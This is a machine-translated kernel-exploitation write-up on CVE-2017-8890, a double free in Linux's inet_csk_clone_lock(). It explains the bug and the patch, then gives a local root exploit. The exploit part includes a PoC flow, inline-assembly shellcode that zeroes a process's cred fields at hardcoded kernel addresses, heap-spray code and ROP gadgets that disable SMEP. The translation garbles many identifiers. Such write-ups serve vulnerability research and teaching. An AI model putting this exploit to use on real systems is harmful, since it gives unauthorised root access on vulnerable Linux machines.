[kernel exploit] CVE-2017-8890 Phoenix Talon vulnerability analysis and utilization

Affected version: Linux 2.5.69~4.10.15 Detailed impact version Score 7.8, which may lead to remote code execution. Hidden for 11 years, dug through syzkaller.

Test version: Linux-4.10.15 Test environment download address — https://github.com/bsauce/kernel_exploit_factory

Compilation option: CONFIG_E1000=y and CONFIG_E1000E=y

General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.10.15.tar.xz
$ tar -xvf linux-4.10.15.tar.xz
# KASAN: set make menuconfig, set "kernel hacking" - > "memory debugging" - > "KASAN: runtime memory debugger".
$ make -j32
$ make all
$ make modules
# Compiled bzImage Directory: / arch/x86/boot/bzImage.

Vulnerability Description: net/ipv4/inet_connection_sock.c in the document inet_csk_clone_lock() Function has double free vulnerability. Specifically, when the server creates a socket and calls accept() to receive a connection, two IP addresses will be generated_ mc_ Pointer to socklist object - mc_list, INET created by the server in close socket and close accept_ When the sock object, the IP_ mc_ The socklist object is released twice, resulting in double free.

Patch: patch When copying objects, set mc_list can point to NULL.

struct sock *inet_csk_clone_lock(const struct sock *sk,
				 const struct request_sock *req,
				 const gfp_t priority)
{
	struct sock *newsk = sk_clone_lock(sk, priority);  // Copy sk. After the copy is completed, the MC is not copied_ List initialization, so there is the same IP address in newsk and sk_ mc_ Pointer to the structure of socklist.

	if (newsk) {
		struct inet_connection_sock *newicsk = inet_csk(newsk);

		newsk->sk_state = TCP_SYN_RECV;
		newicsk->icsk_bind_hash = NULL;

		inet_sk(newsk)->inet_dport = inet_rsk(req)->ir_rmt_port;
		inet_sk(newsk)->inet_num = inet_rsk(req)->ir_num;
		inet_sk(newsk)->inet_sport = htons(inet_rsk(req)->ir_num);
		newsk->sk_write_space = sk_stream_write_space;

		/* listeners have SOCK_RCU_FREE, not the children */
		sock_reset_flag(newsk, SOCK_RCU_FREE);
        
        inet_sk(newsk)->mc_list = NULL;  // <------------------------ patch

		newsk->sk_mark = inet_rsk(req)->ir_mark;
		atomic64_set(&newsk->sk_cookie,
			     atomic64_read(&inet_rsk(req)->ir_cookie));

		newicsk->icsk_retransmits = 0;
		newicsk->icsk_backoff	  = 0;
		newicsk->icsk_probes_out  = 0;

		/* Deinitialize accept_queue to trap illegal accesses. */
		memset(&newicsk->icsk_accept_queue, 0, sizeof(newicsk->icsk_accept_queue));

		security_inet_csk_clone(newsk, req);
	}
	return newsk;
}
EXPORT_SYMBOL_GPL(inet_csk_clone_lock);

Protection mechanism: start SMEP but not SMAP and KASLR

Utilization summary: there are two key points. First, it hijacks the callback function in the RCU structure, which needs to be learned RCU mechanism learning ； Second, ROP cannot be used to raise the right, because the kernel is not in the context of the exp process, and can only use shellcode to modify the uid of the corresponding exp process. Generally speaking, double free is used to tamper with the callback function pointer of RCU, close SMEP and jump to shellcode to modify cred.

1. Create a socket on the server side to enable the kernel to create an IP address_ mc_ Socklist vulnerability object;
1. The sub thread creates the client socket and constantly requests the server to connect connect;
1. The server starts to receive the client request - accept, copy the mc_list pointer;
1. The forged IP address is arranged at the user space address 0x10000000a_ mc_ Socklist structure and ROP chain (the address is the value of EAX when executing xchg gadget. ROP is responsible for saving rbp to rbx and closing SMEP), and the sub thread constantly modifies the func pointer (the kernel will modify the func pointer, resulting in hijacking failure);
1. Close the socket created by the server accept, and the heap will not tamper with the IP_ mc_ socklist->next_ RCU pointer (fixed value 0x10000000a), close the socket of the server and trigger double free.

1, Vulnerability principle

(1) Vulnerability principle

When we program in socket, the socket created by the server side will create one in the kernel inet_sock Structure, temporarily called sock1:

struct inet_sock {
	/* sk and pinet6 has to be the first two members of inet_sock */
	struct sock		sk;
    ............
	__be32			inet_saddr;
	__s16			uc_ttl;
	__u16			cmsg_flags;
	__be16			inet_sport;
	__u16			inet_id;
    .............
	__be32			mc_addr;
	struct ip_mc_socklist __rcu	*mc_list;		// Cause double free
	struct inet_cork_full	cork;
};

struct ip_mc_socklist {
	struct ip_mc_socklist __rcu *next_rcu;							// 0x8
	struct ip_mreqn		multi;										// 0xc
	unsigned int		sfmode;		/* MCAST_{INCLUDE,EXCLUDE} */	// 0x4
	struct ip_sf_socklist __rcu	*sflist;							// 0x8
	struct rcu_head		rcu;										// 0x10
};

When the server side calls accept() to receive foreign connections, a new INET will be created_ The sock structure is called sock2. The sock2 object will copy a copy from the sock1 object ip_mc_socklist Pointer, whose structure is as above.

At this point, there are two different inets in the kernel_ Sock object, but its MC_ The list pointer points to the same IP address_ mc_ Socklist object. After that, when the server side closes the socket, the kernel will release sock1 and release MC_ The IP pointed to by the list pointer_ mc_ Socklist object; When the server closes the sock2 created by accept(), the same IP address will be released again_ mc_ Socklist object, resulting in double free.

(2) Create, copy, release MC_ Call chain of list

Understand can be used to help generate call chains.

Create mc_list—— -> entry_ SYSCALL_ 64_ fastpath() -> SyS_ setsockopt() -> SYSC_ setsockopt() -> sock_ common_ setsockopt() -> tcp_ setsockopt() -> ip_ setsockopt() -> do_ ip_ setsockopt() -> ip_mc_join_group() -> sock_ Kmalloc() - > kmalloc() (click call sock_kmalloc to view the created mc_list)

Copy mc_list—— tcp_ v4_ rcv() -> tcp_ check_ req() -> tcp_ v4_ syn_ recv_ sock() -> tcp_ create_ openreq_ child() -> inet_csk_clone_lock() -> sk_clone_lock

Release mc_list——sock_ close() -> sock_ release() -> ip_mc_drop_socket() -> kfree_rcu() (but it crashes before calling kfree_rcu(), and the crash point is ip_mc_leave_src() function) - > __kfree_rcu() -> kfree_call_rcu() -> __call_rcu() . Real delete call chain: RCU_ do_ batch()-> __rcu_reclaim() (check whether the size of func is less than 4096. If it is less than 4096, it will be released, otherwise func will be called).

mc_list in ip_mc_drop_socket() function. Due to mc_list is a single linked list, which can be accessed through next_rcu to index the next mc_list. Therefore, when it is released, it will cycle through the linked list. In addition, due to mc_list is IP_ mc_ The structure of socklist refers to the RCU mechanism (there will be struct rcu_head rcu; this member in the structure protected by RCU mechanism). Therefore, writing for this structure is special (release can also be understood as a writing process). When the structure protected by RCU mechanism is released, kfree is called_ Rcu() (kfree an object after a grace period) is not really released, but called __call_rcu() Add him to rcu_ In the linked list of head, a grace period (GP) will be marked at this time. When the grace period starts, all read threads are recorded. When these read threads are finished and the clock interrupt is triggered, the callback function of rcu will be called in the soft interrupt to delete this obj.

In short, it can be understood that when a thread wants to write to the member (or delete and release), start a grace period. When all reading threads are finished, the grace period ends. Check whether there is a callback function by triggering the clock interrupt. If there is a callback function, call the callback function of rcu to delete the obj. For simple rcu mechanism, please refer to this article: RCU mechanism learning

Crash: crash on the second release, ip_mc_drop_socket() -> ip_mc_leave_src()，ip_ mc_ leave_ Null pointer reference in src(). First release of MC_ List, the free block may be used by other threads. psf = IML - > sflist, i.e. [mc_list+0x18], sflist is ip_sf_socklist structure pointer, rbx= psf = 0x2, reference psf - > sl_ Count causes a null pointer reference. If psf [mc_list+0x18] is 0, psf - > SL will not be referenced_ Count, the kernel will enter IP_ mc_ drop_ Kfree of socket()_ RCU () process, trigger double free.

void ip_mc_drop_socket(struct sock *sk)
{
	struct inet_sock *inet = inet_sk(sk);
	struct ip_mc_socklist *iml;
	struct net *net = sock_net(sk);

	if (!inet->mc_list)
		return;

	rtnl_lock();
	while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {			// Traverse the linked list and release
		struct in_device *in_dev;

		inet->mc_list = iml->next_rcu;
		in_dev = inetdev_by_index(net, iml->multi.imr_ifindex);
		(void) ip_mc_leave_src(sk, iml, in_dev);						// The function that causes the crash will crash on the second release
		if (in_dev)
			ip_mc_dec_group(in_dev, iml->multi.imr_multiaddr.s_addr);
		/* decrease mem now to avoid the memleak warning */
		atomic_sub(sizeof(*iml), &sk->sk_omem_alloc);
		kfree_rcu(iml, rcu);											// point of release
	}
	rtnl_unlock();
}
// ip_mc_leave_src -- the function that causes the crash, in the first MC_ After the list is released, the data in this dirty memory may be used by other threads.
static int ip_mc_leave_src(struct sock *sk, struct ip_mc_socklist *iml,
			   struct in_device *in_dev)
{
	struct ip_sf_socklist *psf = rtnl_dereference(iml->sflist);
	int err;

	if (!psf) {															// test rbx, rbx
		/* any-source empty exclude case */
		return ip_mc_del_src(in_dev, &iml->multi.imr_multiaddr.s_addr,
			iml->sfmode, 0, NULL, 0);
	}
	err = ip_mc_del_src(in_dev, &iml->multi.imr_multiaddr.s_addr,		
			iml->sfmode, psf->sl_count, psf->sl_addr, 0);				// Crash point mov ecx, DWORD PTR [rbx+0x4] null pointer reference error (PSF - > sl_count)
	RCU_INIT_POINTER(iml->sflist, NULL);
	/* decrease mem now to avoid the memleak warning */
	atomic_sub(IP_SFLSIZE(psf->sl_max), &sk->sk_omem_alloc);
	kfree_rcu(psf, rcu);
	return err;
}

(3)PoC

poc technological process:

	sockfd = socket(AF_INET, xx, IPPROTO_TCP);	// Create a server socket
    setsockopt(sockfd, SOL_IP, MCAST_JOIN_GROUP, xxxx, xxxx);	// Set mcast through setsockopt_ JOIN_ The group option mainly allows the kernel to create IP addresses_ mc_ Socklist object
    bind(sockfd, xxxx, xxxx);
    listen(sockfd, xxxx);
    newsockfd = accept(sockfd, xxxx, xxxx);		// Create another socket through accept to make newsockfd the MC in the kernel_ The list pointer points to the same IP address_ mc_ Socklist object
    close(newsockfd)    // first free (kfree_rcu) closes the new socket. At this time, wait for the grace period of RCU mechanism to end, and trigger the first kfree in RCU callback function.
    sleep(5)            // wait rcu free(real free)
    close(sockfd)       // double free closes the parent socket and triggers the second free at the same position.

2, Utilization - ret2usr (SMEP/SMAP not opened)

(1) Hijacking control flow

Idea: after the first release, stack spray occupies the position, control the data during the second release, and hijack the control flow.

Function pointer: take another look at the IP that causes double free_ mc_ Socklist object containing rcu_head object (actually callback_head Structure), which exactly contains a function pointer func. ip_ mc_ The release of socklist objects involves RCU mechanism , there is a grace period after its release, and the IP is really released_ mc_ The callback function of socklist object is __rcu_reclaim().

struct ip_mc_socklist {
    struct ip_mc_socklist __rcu *next_rcu;
    struct ip_mreqn     multi;
    unsigned int        sfmode;     /* MCAST_{INCLUDE,EXCLUDE} */
    struct ip_sf_socklist __rcu *sflist;
    struct rcu_head     rcu;
};

struct callback_head {
    struct callback_head *next;
    void (*func)(struct callback_head *head);
} 
#define rcu_head callback_head

static inline bool __rcu_reclaim(const char *rn, struct rcu_head *head)
{
	unsigned long offset = (unsigned long)head->func;

	rcu_lock_acquire(&rcu_callback_map);
	if (__is_kfree_rcu_offset(offset)) {
		RCU_TRACE(trace_rcu_invoke_kfree_callback(rn, head, offset));
		kfree((void *)head - offset);
		rcu_lock_release(&rcu_callback_map);
		return true;
	} else {
		RCU_TRACE(trace_rcu_invoke_callback(rn, head));
		head->func(head);			// Execute RCU_ Callback function func in head object. So the target is to hijack rcu_head object.
		rcu_lock_release(&rcu_callback_map);
		return false;
	}
}

(2) Heap spray function

Idea: IP_ mc_ The size of the socklist object is 48 bytes, corresponding to kmalloc-64. First, the modified ipv6_mc_socklist Object to make a heap spray attempt. Stack spray object IPv6_ mc_ When the adrr of socklist is set to ff02:abcd:0:0:0:0:0:1, the first 8 bytes of the heap spray object can be set to 0x00000000cdab02ff, and these 8 bytes are exactly the IP address of the double free object_ mc_ Socklist's next_rcu members.

// Before modification: since two int members are 4 bytes, IPv6 is enabled after aligning them into 8 bytes_ mc_ The socklist structure becomes 72 bytes.
struct ipv6_mc_socklist {
	struct in6_addr		addr;
	int			ifindex;
	struct ipv6_mc_socklist __rcu *next;
	rwlock_t		sflock;
	unsigned int		sfmode;		/* MCAST_{INCLUDE,EXCLUDE} */
	struct ip6_sf_socklist	*sflist;
	struct rcu_head		rcu;
};
// After modification: when two int members are put together, it becomes 64 bytes when allocated
struct ipv6_mc_socklist {
    struct in6_addr     addr;
    int         ifindex;
    unsigned int        sfmode;     /* MCAST_{INCLUDE,EXCLUDE} */
    struct ipv6_mc_socklist __rcu *next;
    rwlock_t        sflock;
    struct ip6_sf_socklist  *sflist;
    struct rcu_head     rcu;
};

(3) Hijack EIP

Problem: by modifying the IP address_ mc_ Func function pointer in socklist structure, but it is actually executing__ rcu_ When using the reclaim() function, the function pointer func has been modified. Originally, kfree_ The RCU () function modifies the IP address_ mc_ Function pointer in socklist object, causing heap spray failure. kfree_rcu() call chain—— kfree_rcu() -> __kfree_rcu() -> kfree_call_rcu() -> __call_rcu().

#define kfree_rcu(ptr, rcu_head)					\
	__kfree_rcu(&((ptr)->rcu_head), offsetof(typeof(*(ptr)), rcu_head)) // <---------- 

static void __call_rcu(struct rcu_head *head, rcu_callback_t func,
	   struct rcu_state *rsp, int cpu, bool lazy)
{
	unsigned long flags;
	struct rcu_data *rdp;

	/* Misaligned rcu_head! */
	WARN_ON_ONCE((unsigned long)head & (sizeof(void *) - 1));

	if (debug_rcu_head_queue(head)) {
		/* Probable double call_rcu(), so leak the callback. */
		WRITE_ONCE(head->func, rcu_leak_callback);
		WARN_ONCE(1, "__call_rcu(): Leaked duplicate callback\n");
		return;
	}
	head->func = func;				// < ---------------- has been modified to an offset, that is, the return value of the previous offsetof()
	head->next = NULL;

Solution: therefore, EIP cannot be hijacked directly by hijacking function pointers. But the RCU mechanism of Linux makes kfree_ After the RCU function is called, it will not be executed immediately__ rcu_reclaim() does the real release, but lets the CPU execute it after a period of time (grace period). Can be in__ rcu_ Modify the IP address again before reclaim() is executed_ mc_ The function pointer in the socklist object can hijack the EIP if ip_mc_socklist object is in user space! Due to IP_ mc_ The first 8 bytes of the socklist object are next_rcu pointer variable, pointing to the next IP address in the RCU linked list_ mc_ Socklist object, via next_rcu pointers form a linked list. You can hijack next_rcu pointer to the IP we forged in user space_ mc_ Socklist object, and then hijack EIP by forging the function pointer of user space object. The layout is as follows:

Put IP_ mc_ After the socklist object is hijacked to the user space, we can modify the func function pointer of the forged object through multi-threaded loop, so as to hijack it to the EIP.

(4)shellcode

Question: you can use commit_creds(prepare_kernel_cred(0)) raises the right, but the premise is that the kernel must be in the context of the exp process, that is, the process descriptor task obtained by the kernel through the current macro_ Struct must belong to the exp process, or the right raising fails. After debugging, it is found that the process context of the kernel when hijacking EIP is ksoftirqd process or rcu_sched process, guess due to RCU mechanism, IP_ mc_ The real release of socklist object is in kernel soft interrupt processing, so when we hijack EIP, the kernel is also in the process context of soft interrupt processing. Therefore, although EIP can be hijacked, it cannot be committed by simply executing commit_ The creds() function performs weight lifting and needs to write its own shellcode. Execute the following code in the kernel:

// find_get_pid and pid_task function is a function exported from the kernel, which is mainly used to find the corresponding process descriptor according to pid.
void get_root(int pid){

      struct pid * kpid = find_get_pid(pid); 
      struct task_struct * task = pid_task(kpid,PIDTYPE_PID); 
      unsigned int * addr = (unsigned  int* )task->cred;

      addr[1] = 0;
      addr[2] = 0;
      addr[3] = 0;
      addr[4] = 0;
      addr[5] = 0;
      addr[6] = 0;
      addr[7] = 0;
      addr[8] = 0;
}
// This code is executed in the kernel and can be compiled and run in the written kernel module, but it is not easy to compile into user space code, so we directly convert it into assembly code:
unsigned long*  find_get_pid = (unsigned long*)0xffffffff81077220;
unsigned long*  pid_task     = (unsigned long*)0xffffffff81077180;
int pid = getpid();
void get_root() {

        asm(
        "sub    $0x18,%rsp;"
        "mov    pid,%edi;"
        "callq  *find_get_pid;"
        "mov    %rax,-0x8(%rbp);"
        "mov    -0x8(%rbp),%rax;"
        "mov    $0x0,%esi;"
        "mov    %rax,%rdi;"
        "callq  *pid_task;"
        "mov    %rax,-0x10(%rbp);"
        "mov    -0x10(%rbp),%rax;"
        "mov    0x5f8(%rax),%rax;"
        "mov    %rax,-0x18(%rbp);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x4,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x8,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0xc,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x10,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x14,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x18,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x1c,%rax;"
        "movl   $0x0,(%rax);"
        "mov    -0x18(%rbp),%rax;"
        "add    $0x20,%rax;"
        "movl   $0x0,(%rax);"
        "nop;"
        "leaveq;" 
        "retq   ;");

}

3, Bypass SMEP

(1) Bypass SMEP

Idea: stack pivot uses the gadget xchg, eax, esp to jump to the ROP chain arranged in the user space. Modify the 20th bit of cr4 register through the following two gadgets. If it is changed to 0, SMEP will be turned off. After closing SMEP, you can jump to the shellcode in user space.

pop rdi; ret
mov cr4, rdi; pop rbp; ret

(2) Heap spray

Requirement: the kernel cannot be modified this time, and the existing objects are used for heap spraying. The heap spray size is required to be 64 bytes, and the first 8 bytes can be controlled. The values of other bytes do not affect the kernel execution process.

Heap spray path: sendmmsg heap spray failed, unable to control the first 8 bytes. At the end of the sock_ Find a suitable call path in malloc's call graph.

ip_mc_source() -> sock_kmalloc() Debugging found that 64 byte heap blocks are just allocated here, and the first 8 bytes are fixed as 0x000000010000000a, and other bytes are 0, which does not affect the kernel execution process. Although the first 8 bytes are uncontrollable, this is the user address space that can be obtained through mmap, so the heap spray method is feasible.

	if (!psl || psl->sl_count == psl->sl_max) {
		struct ip_sf_socklist *newpsl;
		int count = IP_SFBLOCK;

		if (psl)
			count += psl->sl_max;
		newpsl = sock_kmalloc(sk, IP_SFLSIZE(count), GFP_KERNEL);
		if (!newpsl) {
			err = -ENOBUFS;
			goto done;
		}
		newpsl->sl_max = count;
		newpsl->sl_count = count - IP_SFBLOCK;
		if (psl) {

Heap spray code: user space fake IP needs to be modified_ mc_ Address of socklist structure.

#define Heap_Spray_Addr            0x000000010000000a
int sockfd[SPRAY_SIZE];
void spray_init() {
    struct sockaddr_in server_addr;
    struct group_req group;
    struct sockaddr_in *psin=NULL;

    memset(&server_addr,0,sizeof(server_addr));
    memset(&group,0,sizeof(group));

    bzero(&server_addr,sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = htons(INADDR_ANY);
    server_addr.sin_port = htons(HELLO_WORLD_SERVER_PORT);

    psin = (struct sockaddr_in *)&group.gr_group;
    psin->sin_family = AF_INET;
    psin->sin_addr.s_addr = htonl(inet_addr("10.10.2.224"));

    for(int i=0; i<SPRAY_SIZE; i++) {
        if ((sockfd[i] = socket(PF_INET6, SOCK_STREAM, 0)) < 0) {      
           perror("Socket");
           exit(errno);
        }

        setsockopt(sockfd[i], SOL_IP, MCAST_JOIN_GROUP, &group, sizeof (group));
    }

}

void heap_spray(){
    struct ip_mreq_source mreqsrc;
    memset(&mreqsrc,0,sizeof(mreqsrc));
    mreqsrc.imr_multiaddr.s_addr = htonl(inet_addr("10.10.2.224"));

    for(int j=0; j<SPRAY_SIZE; j++) {     
        setsockopt(sockfd[j], IPPROTO_IP, IP_ADD_SOURCE_MEMBERSHIP, &mreqsrc, sizeof(mreqsrc));
    }

}

(3) Complete utilization

Different from the utilization program without SMEP:

(1) Use pivot_stack gadget to jump to the user stack;
(2) Arrange the ROP chain in the user space pointed to by EAX, modify cr4 and jump to get_root；
(3) Heap injection initialization function and heap injection function.
(4) Because the construction of ROP chain will damage the value of rbp, but get_ When root() returns, it needs to give rbp to rsp (leave; ret;), Therefore, rbp needs to be saved at the beginning of ROP chain, and then get_ Restore rbp starting with root(). (the method is to save it to the rcx register through the ROP chain and assign it to rbp at the beginning of get_root() -- mov% rcx,% rbp;)

Follow up: SMAP can be bypassed by ret2dir method; IP can be forged in kernel space_ mc_ socklist.

Successful screenshot:

4, Question

Problem 1: after starting the virtual machine each time, the command $ifconfig -a has only lo local network card. And the init script cannot establish eth0 network card when starting.

Solution: generally start like this. qemu simulates the e1000 network card. The default compilation of linux kernel will not compile e1000 network card driver into the kernel. At compile time Config in CONFIG_E1000 and CONFIG_E1000E, change to = y. reference resources

Question 2: the vulnerability will not be triggered at all. It won't come to IP at all_ mc_ join_ group() -> sock_ Kmalloc(), not created reference resources

int ip_mc_join_group(struct sock *sk, struct ip_mreqn *imr)
{
	__be32 addr = imr->imr_multiaddr.s_addr;
	struct ip_mc_socklist *iml, *i;
	struct in_device *in_dev;
	struct inet_sock *inet = inet_sk(sk);
	struct net *net = sock_net(sk);
	int ifindex;
	int count = 0;
	int err;

	ASSERT_RTNL();

	if (!ipv4_is_multicast(addr))  		// Check whether the ip address is 0xe0, that is, the end of 224. It must be a multicast address?
		return -EINVAL;

//Find the interface device to which the multicast address is set.
//1. If the user passes in the interface index, the interface index is used for searching. (e.g. under IPv6)
//2. Otherwise, if the user passes in the address of the interface, the address will be used for searching
//3. Otherwise, the multicast address is used for routing table lookup. According to the definition of the routing table, find the network interface in the routing table according to the group address.
	in_dev = ip_mc_find_dev(net, imr);	// Find route?? It has failed all the time here. It may be the routing configuration problem of the virtual machine

	if (!in_dev) {
		err = -ENODEV;
		goto done;
	}

	err = -EADDRINUSE;
	ifindex = imr->imr_ifindex;
	for_each_pmc_rtnl(inet, i) {
		if (i->multi.imr_multiaddr.s_addr == addr &&
		    i->multi.imr_ifindex == ifindex)
			goto done;
		count++;
	}
	err = -ENOBUFS;
	if (count >= net->ipv4.sysctl_igmp_max_memberships)
		goto done;
	iml = sock_kmalloc(sk, sizeof(*iml), GFP_KERNEL); 	// Give IP_ mc_ The socklist structure allocates memory, and then compares each group address and interface of the socket. As long as a match is found, it will jump out of the function, because there is a match. If the network interface address is not INADDR_ANY, the corresponding counter value will increase.
	if (!iml)
		goto done;

	memcpy(&iml->multi, imr, sizeof(*imr));	// Here, you can use the newly created socket to establish a link with the multicast group. At this time, you must also create a new record to record the list of groups belonging to the socket. First, allocate memory in advance, and then assign values to several fields in the related structure to complete the operation:
	iml->next_rcu = inet->mc_list;
	iml->sflist = NULL;
	iml->sfmode = MCAST_EXCLUDE;
	rcu_assign_pointer(inet->mc_list, iml);
	ip_mc_inc_group(in_dev, addr);
	err = 0;
done:
	return err;
}

Solution: execute to ip_mc_find_dev(net, imr) returns 0 and exits. The network interface cannot be found in the routing table according to the group address. The reason is that the IP route of level D multicast network is not added (usually Ubuntu will automatically specify this, but I run in QEMU, so it is not set by default). The following paths need to be added: Linux configuration and testing IP Multicast

$ route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0

Class D addresses are used for multicast. The first byte of class D IP address starts with "1110", which is a specially reserved address. It does not point to a specific network. At present, this kind of address is used in multicast. Multicast address is used to address a group of computers at a time. It identifies a group of computers sharing the same protocol. The IP address of class D does not identify the network, and its address coverage range is 224.0.0.0 ~ 239.255.255.255.

Question 3: shellcode executed successfully, but failed to modify cred.

Solution: cred may be relative to task_ The offset of the first address of struct structure is wrong.

gdb-peda$ p/x &(*(struct task_struct *)0)->cred				# So cred members are relative to task_ The first address of struct structure differs by 0x640, not 0x5f8, which needs to be modified
$2 = 0x640